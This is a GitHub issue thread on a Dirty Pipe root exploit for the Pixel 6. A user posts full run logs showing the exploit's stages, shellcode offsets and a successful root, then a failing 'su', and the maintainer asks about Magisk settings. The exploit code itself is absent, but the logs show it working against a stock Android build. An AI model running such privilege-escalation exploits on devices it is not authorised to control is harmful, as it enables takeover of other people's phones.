polygraphene / DirtyPipe-Android

Dirty Pipe root exploit for Android (Pixel 6)

su permission denied #10

Open 0xceb1d opened 2 years ago

0xceb1d commented 2 years ago

Gave this a few shots on a Pixel 6 device running SQ1D.220205.003 (8069835). Needed to set the -f flag, even though the build should technically be fine with the version check.

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 57.6 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 42.6 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 34.2 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 34.2 MB/s (14522684 bytes in 0.405s)
10 files pushed, 0 skipped. 33.5 MB/s (14588207 bytes in 0.415s)
Unsupported version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys

Full run logs

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 61.7 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 59.4 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 44.5 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 36.6 MB/s (14522684 bytes in 0.379s)
10 files pushed, 0 skipped. 35.9 MB/s (14588207 bytes in 0.387s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libstagefright_soft_mp3dec.so
Offset found: shellcode_offset: a2de0 hook_offset: 5a9dc first instruction: a9be7bfd
Empty space size: 544 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
It worked!
0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % adb shell
oriole:/ $ cd /data/local/tmp
oriole:/data/local/tmp $ ls
dirtypipe-android  dirtypipe-run-index  env-patcher  magisk  mylog2  root-log1  startup-root
oriole:/data/local/tmp $ cat root-log1
Successfully access log. Try=2
Start startup-root
Thu May 26 21:44:48 BST 2022: uid=0(root) gid=0(root) groups=0(root),3009(readproc) context=u:r:magisk:s0
oriole:/data/local/tmp $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
oriole:/data/local/tmp $ su
Permission denied
13|oriole:/data/local/tmp $

polygraphene commented 2 years ago

Did you configure the Magisk app to permit su access for adb shell?